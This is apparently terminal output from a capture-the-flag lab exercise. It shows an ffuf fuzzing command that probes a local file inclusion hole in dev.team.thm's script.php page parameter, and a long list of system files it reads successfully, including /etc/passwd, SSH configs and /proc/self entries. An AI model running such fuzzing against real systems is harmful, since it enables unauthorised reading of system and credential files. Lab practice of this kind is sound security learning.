ffuf -u 'http://dev.team.thm/script.php?page=FUZZ' -w wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -t 64 -fs 1

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://dev.team.thm/script.php?page=FUZZ
 :: Wordlist         : FUZZ: /root/active/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 64
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 1
________________________________________________

/etc/apache2/apache2.conf [Status: 200, Size: 7313, Words: 944, Lines: 231, Duration: 64ms]
/etc/passwd             [Status: 200, Size: 2203, Words: 18, Lines: 43, Duration: 70ms]
/etc/crontab            [Status: 200, Size: 721, Words: 103, Lines: 16, Duration: 71ms]
/etc/lsb-release        [Status: 200, Size: 105, Words: 3, Lines: 6, Duration: 72ms]
/etc/fstab              [Status: 200, Size: 424, Words: 62, Lines: 11, Duration: 72ms]
/etc/hosts.deny         [Status: 200, Size: 712, Words: 128, Lines: 19, Duration: 113ms]
/etc/hosts.allow        [Status: 200, Size: 412, Words: 82, Lines: 12, Duration: 113ms]
/etc/hosts              [Status: 200, Size: 185, Words: 19, Lines: 9, Duration: 115ms]
/etc/profile            [Status: 200, Size: 582, Words: 145, Lines: 29, Duration: 64ms]
/etc/ssh/sshd_config    [Status: 200, Size: 6013, Words: 305, Lines: 170, Duration: 62ms]
/etc/ssh/ssh_config     [Status: 200, Size: 1604, Words: 245, Lines: 54, Duration: 64ms]
/etc/resolv.conf        [Status: 200, Size: 755, Words: 99, Lines: 21, Duration: 64ms]
/proc/filesystems       [Status: 200, Size: 386, Words: 1, Lines: 34, Duration: 64ms]
/proc/ioports           [Status: 200, Size: 555, Words: 106, Lines: 25, Duration: 64ms]
/proc/modules           [Status: 200, Size: 3837, Words: 366, Lines: 75, Duration: 64ms]
/proc/meminfo           [Status: 200, Size: 1420, Words: 491, Lines: 53, Duration: 64ms]
/proc/version           [Status: 200, Size: 195, Words: 23, Lines: 3, Duration: 60ms]
/proc/cpuinfo           [Status: 200, Size: 2183, Words: 271, Lines: 58, Duration: 64ms]
/etc/vsftpd.conf        [Status: 200, Size: 5937, Words: 806, Lines: 161, Duration: 64ms]
/proc/interrupts        [Status: 200, Size: 1911, Words: 885, Lines: 37, Duration: 64ms]
/proc/swaps             [Status: 200, Size: 104, Words: 32, Lines: 4, Duration: 61ms]
/proc/mounts            [Status: 200, Size: 3319, Words: 216, Lines: 45, Duration: 61ms]
/proc/stat              [Status: 200, Size: 1164, Words: 489, Lines: 12, Duration: 63ms]
/proc/self/net/arp      [Status: 200, Size: 388, Words: 179, Lines: 7, Duration: 63ms]
/var/log/faillog        [Status: 200, Size: 32161, Words: 1, Lines: 2, Duration: 66ms]
/var/log/lastlog        [Status: 200, Size: 293461, Words: 2, Lines: 6, Duration: 86ms]
/var/log/dmesg          [Status: 200, Size: 43827, Words: 6745, Lines: 577, Duration: 90ms]
/var/run/utmp           [Status: 200, Size: 1537, Words: 1, Lines: 2, Duration: 66ms]
/var/log/wtmp           [Status: 200, Size: 84481, Words: 2, Lines: 18, Duration: 67ms]
/etc/adduser.conf       [Status: 200, Size: 3029, Words: 402, Lines: 90, Duration: 98ms]
/etc/apache2/mods-available/dir.conf [Status: 200, Size: 158, Words: 15, Lines: 7, Duration: 61ms]
/etc/apache2/mods-available/deflate.conf [Status: 200, Size: 396, Words: 23, Lines: 12, Duration: 61ms]
/etc/apache2/envvars    [Status: 200, Size: 1783, Words: 190, Lines: 49, Duration: 61ms]
/etc/apache2/mods-available/proxy.conf [Status: 200, Size: 823, Words: 124, Lines: 29, Duration: 61ms]
/etc/apache2/mods-available/ssl.conf [Status: 200, Size: 3111, Words: 431, Lines: 87, Duration: 61ms]
/etc/apache2/mods-enabled/deflate.conf [Status: 200, Size: 396, Words: 23, Lines: 12, Duration: 61ms]
/etc/apache2/mods-available/mime.conf [Status: 200, Size: 7677, Words: 943, Lines: 253, Duration: 62ms]
/etc/apache2/mods-enabled/alias.conf [Status: 200, Size: 844, Words: 115, Lines: 26, Duration: 63ms]
/etc/apache2/mods-available/setenvif.conf [Status: 200, Size: 1374, Words: 119, Lines: 36, Duration: 63ms]
/etc/apache2/mods-available/autoindex.conf [Status: 200, Size: 3375, Words: 313, Lines: 98, Duration: 65ms]
/etc/apache2/mods-enabled/dir.conf [Status: 200, Size: 158, Words: 15, Lines: 7, Duration: 72ms]
/etc/apache2/mods-enabled/mime.conf [Status: 200, Size: 7677, Words: 943, Lines: 253, Duration: 60ms]
/etc/apache2/mods-enabled/negotiation.conf [Status: 200, Size: 725, Words: 109, Lines: 22, Duration: 99ms]
/etc/apache2/ports.conf [Status: 200, Size: 321, Words: 36, Lines: 17, Duration: 99ms]
/etc/apache2/mods-enabled/status.conf [Status: 200, Size: 750, Words: 82, Lines: 31, Duration: 108ms]
/etc/bash.bashrc        [Status: 200, Size: 2320, Words: 399, Lines: 73, Duration: 63ms]
/etc/ca-certificates.conf.dpkg-old [Status: 200, Size: 7818, Words: 64, Lines: 195, Duration: 61ms]
/etc/crypttab           [Status: 200, Size: 55, Words: 5, Lines: 3, Duration: 65ms]
/etc/ca-certificates.conf [Status: 200, Size: 8455, Words: 64, Lines: 209, Duration: 61ms]
/etc/deluser.conf       [Status: 200, Size: 605, Words: 86, Lines: 22, Duration: 61ms]
/etc/debconf.conf       [Status: 200, Size: 2970, Words: 411, Lines: 85, Duration: 61ms]
/etc/debian_version     [Status: 200, Size: 14, Words: 1, Lines: 3, Duration: 62ms]
/etc/default/grub       [Status: 200, Size: 1202, Words: 141, Lines: 35, Duration: 61ms]
/etc/dhcp/dhclient.conf [Status: 200, Size: 1736, Words: 168, Lines: 56, Duration: 68ms]
/etc/ftpusers           [Status: 200, Size: 133, Words: 10, Lines: 16, Duration: 60ms]
/etc/fuse.conf          [Status: 200, Size: 281, Words: 38, Lines: 10, Duration: 63ms]
/etc/hdparm.conf        [Status: 200, Size: 5061, Words: 757, Lines: 144, Duration: 62ms]
/etc/group              [Status: 200, Size: 1091, Words: 1, Lines: 72, Duration: 63ms]
/etc/hostname           [Status: 200, Size: 18, Words: 1, Lines: 3, Duration: 61ms]
/etc/group-             [Status: 200, Size: 1004, Words: 1, Lines: 71, Duration: 68ms]
/etc/host.conf          [Status: 200, Size: 93, Words: 16, Lines: 5, Duration: 67ms]
/etc/ld.so.conf         [Status: 200, Size: 35, Words: 2, Lines: 4, Duration: 60ms]
/etc/issue.net          [Status: 200, Size: 20, Words: 3, Lines: 3, Duration: 68ms]
/etc/ldap/ldap.conf     [Status: 200, Size: 333, Words: 23, Lines: 19, Duration: 61ms]
/etc/manpath.config     [Status: 200, Size: 5216, Words: 530, Lines: 134, Duration: 63ms]
/etc/kernel-img.conf    [Status: 200, Size: 145, Words: 17, Lines: 8, Duration: 67ms]
/etc/logrotate.conf     [Status: 200, Size: 534, Words: 77, Lines: 26, Duration: 66ms]
/etc/login.defs         [Status: 200, Size: 10551, Words: 1638, Lines: 343, Duration: 66ms]
/etc/ltrace.conf        [Status: 200, Size: 14868, Words: 1011, Lines: 545, Duration: 65ms]
/etc/modules            [Status: 200, Size: 196, Words: 33, Lines: 7, Duration: 109ms]
/etc/os-release         [Status: 200, Size: 383, Words: 6, Lines: 14, Duration: 66ms]
/etc/pam.conf           [Status: 200, Size: 553, Words: 65, Lines: 17, Duration: 66ms]
/etc/passwd-            [Status: 200, Size: 2203, Words: 18, Lines: 43, Duration: 61ms]
/etc/security/access.conf [Status: 200, Size: 4565, Words: 635, Lines: 124, Duration: 63ms]
/etc/security/namespace.conf [Status: 200, Size: 1441, Words: 219, Lines: 30, Duration: 62ms]
/etc/security/group.conf [Status: 200, Size: 3636, Words: 690, Lines: 108, Duration: 62ms]
/etc/security/time.conf [Status: 200, Size: 2180, Words: 342, Lines: 67, Duration: 66ms]
/etc/security/sepermit.conf [Status: 200, Size: 420, Words: 106, Lines: 13, Duration: 66ms]
/etc/security/limits.conf [Status: 200, Size: 2162, Words: 747, Lines: 58, Duration: 68ms]
/etc/security/pam_env.conf [Status: 200, Size: 2973, Words: 429, Lines: 75, Duration: 66ms]
/etc/sysctl.d/10-network-security.conf [Status: 200, Size: 159, Words: 14, Lines: 8, Duration: 62ms]
/etc/sysctl.conf        [Status: 200, Size: 2352, Words: 250, Lines: 70, Duration: 63ms]
/etc/timezone           [Status: 200, Size: 15, Words: 1, Lines: 3, Duration: 62ms]
/etc/sysctl.d/10-console-messages.conf [Status: 200, Size: 78, Words: 13, Lines: 5, Duration: 67ms]
/etc/updatedb.conf      [Status: 200, Size: 557, Words: 60, Lines: 6, Duration: 75ms]
/proc/net/udp           [Status: 200, Size: 385, Words: 100, Lines: 5, Duration: 61ms]
/proc/net/tcp           [Status: 200, Size: 1951, Words: 675, Lines: 15, Duration: 62ms]
/proc/devices           [Status: 200, Size: 601, Words: 101, Lines: 65, Duration: 88ms]
/proc/self/cmdline      [Status: 200, Size: 28, Words: 1, Lines: 2, Duration: 88ms]
/proc/self/stat         [Status: 200, Size: 315, Words: 52, Lines: 3, Duration: 64ms]
/proc/self/status       [Status: 200, Size: 1373, Words: 93, Lines: 59, Duration: 64ms]
/proc/self/mounts       [Status: 200, Size: 3319, Words: 216, Lines: 45, Duration: 71ms]
/etc/issue              [Status: 200, Size: 27, Words: 5, Lines: 4, Duration: 1444ms]
/usr/share/adduser/adduser.conf [Status: 200, Size: 3029, Words: 402, Lines: 90, Duration: 60ms]
/etc/mtab               [Status: 200, Size: 3319, Words: 216, Lines: 45, Duration: 3455ms]
/etc/network/interfaces [Status: 200, Size: 91, Words: 13, Lines: 6, Duration: 4432ms]
/etc/networks           [Status: 200, Size: 92, Words: 11, Lines: 4, Duration: 4452ms]
